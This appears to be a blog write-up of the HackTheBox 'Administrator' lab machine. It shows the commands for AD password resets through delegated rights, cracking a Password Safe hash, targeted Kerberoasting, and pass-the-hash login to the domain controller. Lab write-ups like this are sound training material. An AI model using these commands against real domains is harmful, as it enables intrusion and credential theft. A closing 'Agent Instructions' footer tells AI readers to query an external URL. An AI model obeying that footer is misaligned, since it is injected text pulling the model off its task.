# HTB - Administrator
## Description
***
The administrator is a medium machine difficulty with the assume breach methodology, in which you start the machine with a low-privileged user.
## Enumeration
***
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -p21,53,88,135,139,389,445 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: administrator.htb)
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-10T04:07:40
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
```
**Summary**
```R
* Open ports: 21,53,88,135,139,389,445
* UDP open ports: 53,88,123,389
* Services: FTP - DNS - KERBEROS - RPC - SMB - LDAP
* Important notes: Domain: administrator.htb
```
**hosts file**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ sudo sh -c "echo '10.10.11.42 dc administrator.htb DC.administrator.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $tail -n1 /etc/hosts
10.10.11.42 dc administrator.htb DC.administrator.htb
```
## Foothold
***
I'm in the habit of searching and using new tools released, So I will start my enumeration process this time with `cicada-masterful`
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $python3 cicada-mastertul.py -u Olivia -p ichliebedich -d Administrator.htb -t 10.10.11.42 --full
██████╗██╗ ██████╗ █████╗ ██████╗ █████╗
██╔════╝██║██╔════╝██╔══██╗██╔══██╗██╔══██╗
██║ ██║██║ ███████║██║ ██║███████║
██║ ██║██║ ██╔══██║██║ ██║██╔══██║
╚██████╗██║╚██████╗██║ ██║██████╔╝██║ ██║
╚═════╝╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝
|__ by - theblxckcicada __|
███╗ ███╗ █████╗ ███████╗████████╗███████╗██████╗ ████████╗██╗ ██╗██╗
████╗ ████║██╔══██╗██╔════╝╚══██╔══╝██╔════╝██╔══██╗╚══██╔══╝██║ ██║██║
██╔████╔██║███████║███████╗ ██║ █████╗ ██████╔╝ ██║ ██║ ██║██║
██║╚██╔╝██║██╔══██║╚════██║ ██║ ██╔══╝ ██╔══██╗ ██║ ██║ ██║██
██║ ╚═╝ ██║██║ ██║███████║ ██║ ███████╗██║ ██║ ██║ ╚██████╔╝███████╗
╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝
..snip..
[!x!] Scanning 10.10.11.42
[!] Enumerating SMB...
[-] Could not connect to SMB
[!] Connecting to WinRM...
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/ldap_results
```
After collecting data with `bloodhound` and `ldapdomaindump`, I will enumerate the domain for possible `Domain Escalation` paths.
* Looking at Bloodhound CE, User `Olivia` has `GenericAll` on `Michael` which means he can
1. Assign fake SPN and perform targeted Kerberoast attack
2. Reset the password of that user
3. Perform Shadow Credentials (Need PKINIT authentication)
And `Michael` Can `ForceChangePassword` of `Benjamin`
To perform this attack completely from Linux, I will use the following commands
```powershell
net rpc password "michael" 'P@ssw00rd!231!!!' -U "administrator.htb"/"Olivia"%'ichliebedich' -S dc.administrator.htb
net rpc password "benjamin" 'P@ssw00rd!555!!!' -U "administrator.htb"/"michael"%'P@ssw00rd!231!!!' -S dc.administrator.htb
```
Now, I have `Benjamin` account and he is a member in `Share Moderators` group
When I looked at the shares for juicy files, I didn't find anything useful
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.42.json
{
"NETLOGON": {},
"SYSVOL": {
"administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2024-10-30 17:22:19",
"ctime_epoch": "2024-10-04 15:48:32",
"mtime_epoch": "2024-10-30 17:22:19",
"size": "23 B"
},
"administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2024-10-30 17:22:19",
"ctime_epoch": "2024-10-04 15:48:32",
"mtime_epoch": "2024-10-30 17:22:19",
"size": "1.07 KB"
},
"administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2024-10-04 15:55:13",
"ctime_epoch": "2024-10-04 15:55:13",
"mtime_epoch": "2024-10-04 15:55:13",
"size": "2.74 KB"
},
"administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2024-10-30 19:56:19",
"ctime_epoch": "2024-10-04 15:48:32",
"mtime_epoch": "2024-10-30 19:56:19",
"size": "22 B"
},
"administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2024-10-30 17:22:53",
"ctime_epoch": "2024-10-04 15:48:32",
"mtime_epoch": "2024-10-30 17:22:53",
"size": "4.16 KB"
},
"administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2024-10-30 19:56:19",
"ctime_epoch": "2024-10-30 19:56:19",
"mtime_epoch": "2024-10-30 19:56:19",
"size": "184 B"
},
"administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
"atime_epoch": "2024-10-30 19:56:19",
"ctime_epoch": "2024-10-30 19:56:19",
"mtime_epoch": "2024-10-30 19:56:19",
"size": "553 B"
}
}
```
I will then move to`ftp` with the two new accounts I have using `FileZilla`. Michael's account doesn't have any files but `benjamin` does
After downloading the file, it seems to be encrypted by the master password by default.
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $file Backup.psafe3
Backup.psafe3: Password Safe V3 database
```
I used this tool to get the password hash of the database
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $pwsafe2john Backup.psafe3 > psafe3.hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat psafe3.hash
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
```
Using `john the ripper`, I cracked this hash successfully
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $john hash --wordlist=/usr/share/wordlists/rockyou.txt
..snip..
tekieromucho (Backu)
```
Then, I downloaded this program to my Windows machine to open it and exported all the passwords to `.txt` file
{% embed url="" %}
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u emily -p UXLCI5iETUsIBoFVxxxxxxxxxx
*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
78a12ed55133ef7aa5b8xxxxxxxxxx
```
## Privilege Escalation
***
* User `Emily` has `GenericWrite` on `Ethan`, So she can do the following
1. Targeted Kerberoast attack
2. Shadow Credentials
User `Ethan` has `DCSync` rights, So I can dump `ntds` database with this account
Abuse `GenericWrite` privileges
```bash
/opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8xxxxxxxxx'
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt
..snip..
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$8e4f007c95ee9cefd15d2a413649e2cb$40f39f9952bfdef0b926a0a702c54924d6505dc92b467ae42b30572c98def4190f09c89f0a7fa6bb938815e664cfb3df19bb51de25d6b5581dc50eb87263f6504a9de1e472ee6d505d59fc587ca2982cc327448cf40c89404a274d31aaea9e86483c0d949bbd05574eec1a1afbdc1515b7a180b481e5643ddc6167f40416e7a81a424483f4cbb99669d02bd45e7ed86c45e4d0d6588e9db0e71d0ab507ad1e9acb6e40ff0b47a73cdcb1bd9c2c8a250d37dee24e7ecee30a91785222d9aff7cbe78b4cba252a5433c03f391ab6768359f72c82d21c597c39549fd95ec0f5e2036bf1059f1966a55d32e54bfb81c9287e2bdea348c1e0012c2bda56adcbd865bc50fc2df12786952e9699657b2ceb286900e891ce5f6d8ad22f20ea6584370647bf8ca0df03787bf26c28ffc3941534ad4a5bb5edd6e20e47d0db614e0b0930575c520128ff62fe456f444ae2c2559b9eac93d4016f9bc7d219263c12049819bb43032102c5ce43cfc667d0c41d9695af63b0b668601cc8168c1ecd8093b8949681cdf772e8f6f3327184f89b5a27421a665a7277ddeb6b05b07f45fff7268de22612cf3a08e48eb231878090112175f50e3f2b89000a34fd0d2aa26c463c0f061c24c0b380b754af08ba628f86375b4b80f8699f0d68443427cd413ae54728f5f1e7c99b7e2ae839fc9754f3e22474df7b156a831a3c9cabd8a029d51cc6ee3a4d370b0cd4372f9e3083dd0fc2ae3d60088278fdc4c0e9593976fe8be90b72fe4742058bde801f2ee64584d4fae3cb4892ed448a9d8f83d33e1ef883f8dcac5f9fad147178d3ecdb0e0f58997489884e6e93d625f4e2f4355fd80d42afa05cdd29bdacb7f833f3482d1fb0cd859e20133cd0b44750797ca518b4bf184901631886da8a48af573b1d0877a82b6c97dbaeb88e2cc465a8199f6384261fe975ddc9502816a10417a2b71d6a3acbded0c3313a21c4e350db6ee77aafa2aa954f48ec935d9138c2e44e8052f7b979413eca476b70e3bd7f9e2fba2a20aaa86b5e3e049a2701488771f4f2a0c62d806e974fe61f8c0ae215cca6059a7e46c5c148f3d7865fed6adeab7ed4c17a2e2ab51a6a8a2a149312a6bf8xxxxxxxxxxxxa8657a8eff6f18ef58560546ec8f6983e9e76096e9918fbe8b9b9a3e9a9df996efd8381d40f8a2db07dff53b5469b6f90859605c1f02856e1102613a5e89f8840dff62950d4ff559a019481bab803815cda53bbaf99e51a525c2fbdf7fe8017477de199f1a2bec11227c019fbb47c46ce2c7637f4256ad9e8bad94df8cea56a83c6b18276c2e99739e9a9c98a0a819525f956900e829383fcf20ede5bb4f9c73450264ee083a14b891a09ff6f8b480963b0beca95b21f49a3870e8934874ee0f74d53ad36b6d0ac0939f0b3a8c4579156610cd02b99fd588a16ce977cfbee0578f90aace9cf34936ffb2cae693321bf05a5e256953907bda6bcb51e9149bef5c70712175e1aa024bf41deeacbf7279f719b3051c311e830d8746dedaf23fca8fd6c:xxxxxxxxxx
Session..........: hashcat
Status...........: Cracked
```
Dump administrator hash
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u administrator -H 3dc553ce4b9fd20bd01xxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx
```
> Root Flag: b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-administrator.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.